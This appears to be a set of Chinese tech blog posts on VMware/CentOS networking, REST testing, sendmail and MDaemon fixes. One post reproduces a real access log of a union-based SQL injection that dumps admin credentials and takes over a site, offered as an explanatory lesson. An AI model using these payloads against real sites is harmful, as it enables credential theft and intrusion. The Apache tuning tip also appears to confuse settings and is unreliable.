vmware在nat下的靜態ip設定-以centos7為例

1.找到Virtual Network Editor

在vmwere下找 vmnetcfg.exe

2.看dhcp與nat的範圍與他的geteway, 注意 geteway 的ip並非是你想的那個,看工具最準

或者用指令

ip route show

看geteway ip
再來 以centos 7 為例

1.檢查 Network Manager 是否啟動

systemctl status NetworkManager.service 

2.檢查使用的網卡

ip route show 

3.進入 nmtui 設定網路,若沒有則安裝

yum install NetworkManager-tui

 

4.重啟網路

systemctl restart network.service

5.ping google.com

典型sql injection攻擊手法

朋友網站被駭客入侵改首頁
我看了一下log,發現了有趣的事情

85.237.211.211 – – [16/Mar/2013:06:33:46 +0800] “GET /manager.php HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:33:47 +0800] “GET /news.php?id=76 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:50 +0800] “GET /news.php?id=999999.9 HTTP/1.1” 200 12580
85.237.211.211 – – [16/Mar/2013:06:33:52 +0800] “GET /news.php?id=76+and+1%3D1 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:53 +0800] “GET /news.php?id=76+and+1%3E1 HTTP/1.1” 200 12580
85.237.211.211 – – [16/Mar/2013:06:33:54 +0800] “GET /news.php?id=76+and+1%3D1 HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:33:56 +0800] “GET /news.php?id=76%27 HTTP/1.1” 200 6814
85.237.211.211 – – [16/Mar/2013:06:33:57 +0800] “GET /news.php?id=%2F*%2130000+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:00 +0800] “GET /news.php?id=%2F*%2140100+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:02 +0800] “GET /news.php?id=%2F*%2150000+76*%2F HTTP/1.1” 200 12754
85.237.211.211 – – [16/Mar/2013:06:34:03 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:34:04 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:05 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:06 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:07 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:08 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:10 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:11 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 6728
85.237.211.211 – – [16/Mar/2013:06:34:12 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12620
85.237.211.211 – – [16/Mar/2013:06:34:14 +0800] “GET /news.php?id=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12620
85.237.211.211 – – [16/Mar/2013:06:34:15 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12635
85.237.211.211 – – [16/Mar/2013:06:34:16 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12623
85.237.211.211 – – [16/Mar/2013:06:34:26 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12615
85.237.211.211 – – [16/Mar/2013:06:34:27 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28table_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x69626563636F6D7477%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12668
85.237.211.211 – – [16/Mar/2013:06:34:32 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28column_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12616
85.237.211.211 – – [16/Mar/2013:06:34:34 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28column_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x69626563636F6D7477+and+table_name%3D0x61646D696E6973747261746F72%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12695
從information_schema拿到db架構
114.46.219.96 – – [16/Mar/2013:06:34:38 +0800] “GET / HTTP/1.1” 200 1191
114.46.219.96 – – [16/Mar/2013:06:34:40 +0800] “GET /Scripts/AC_RunActiveContent.js HTTP/1.1” 200 2413
114.46.219.96 – – [16/Mar/2013:06:34:40 +0800] “GET /js/jquery-1.7.1.min.js HTTP/1.1” 200 33140
85.237.211.211 – – [16/Mar/2013:06:34:40 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280x7e%2C0x27%2Ccount%28*%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12615
85.237.211.211 – – [16/Mar/2013:06:34:42 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admin+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12619
85.237.211.211 – – [16/Mar/2013:06:34:43 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12624
85.237.211.211 – – [16/Mar/2013:06:34:45 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admin.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12619
85.237.211.211 – – [16/Mar/2013:06:34:46 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_password+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12624
85.237.211.211 – – [16/Mar/2013:06:34:47 +0800] “GET /news.php?id=999999.9+union+all+select+0x31303235343830303536%2C%28select+concat%280×27%2C0x7e%2Cunhex%28Hex%28cast%28admini.a_account+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60dbname%60.admini+Order+by+a_account+limit+2%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536– HTTP/1.1” 200 12617
拿到密碼後就進去了
85.237.211.211 – – [16/Mar/2013:06:35:12 +0800] “POST /admin/login.php HTTP/1.1” 302 1129
85.237.211.211 – – [16/Mar/2013:06:35:13 +0800] “GET /admin/index.php HTTP/1.1” 200 712
85.237.211.211 – – [16/Mar/2013:06:35:17 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:17 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:18 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:28 +0800] “GET /admin/administrator.php HTTP/1.1” 200 1303
85.237.211.211 – – [16/Mar/2013:06:35:30 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:31 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:32 +0800] “GET /favicon.ico HTTP/1.1” 404 289
85.237.211.211 – – [16/Mar/2013:06:35:34 +0800] “GET /admin/administrator-editor.php?a_contorller=admin HTTP/1.1” 200 1421
改個admin就拿到admin….這種寫法小職員也可以變老闆阿…
看來…面試php程式設計師時,真的要把sql injection列入必考題阿

Simple REST Client POST使用方法

Simple REST Client 是chrome上的測試工具,要如何使用post的方式呢
除了在method上設定為post外,最重要的就是Headers了
Herders在基本的post設定是

Content-Type: application/x-www-form-urlencoded
Data的部分用”&”連結
email=123@ddd&password=abc123
這樣就可以了
如果要測試上傳檔案的話
建議使用dev http client這個chrome外掛
使用的方式也是差不多的
記得把content type改成
multipart/form-data
他比較麻煩一點,先按+號增加一個屬性,左邊的inputbox是屬性,右邊的是屬性值

#2014-5-1

推薦使用postman…

unable to qualify my own domain name

在sendmail的mail log內出現這個問題
解決方案
在hosts內設定
192.168.1.1 myhostname myhostname.com.

這裡的192.168.1.1 是主機的內部ip位置,跟127.0.0.1不同,
127.0.0.1的那組ip不要修改 恢復為預設的127.0.0.1 localhost localhost.localhost
最後的hostname 在最後加一個”.”
最後測試寄信
echo “this is mail body” | mail -s my_subject xxx@gmail.com
輸入完後如果很快就回到command line 代表你成功了

google checkout sandbox

google checkout sandbox
http://code.google.com/intl/zh-TW/apis/checkout/developer/Google_Checkout_Basic_HTML_Sandbox.html
看起來可以透過google checkout的國家也只有美國跟英國而已

檢查80port的連線數量-linux

最近網站有點慢 可是cacti又看不出來流量暴衝的狀況
可能是網站連線數量的問題
檢查連線數量用的指令

netstat -ant | grep :80 | wc -l
559
如果數量超過apache的設定(內定100)
就該考慮一下要不要增加apache 最大連線數
MaxKeepAliveRequests 700
設定完成後 順暢多了

Mdeamon 的 550問題

1.dns設定
在SETUP=>DEFAULT DOMAIN=>DNS
Try out use不要打勾 不要使用本機機器上的dns

2.寄件人帳號===驗證登入的帳號
我被第二個搞死……………………………..
如果兩個帳號不一樣,那我保證在Mdeamon一定沒辦法通過RECT TO 這關….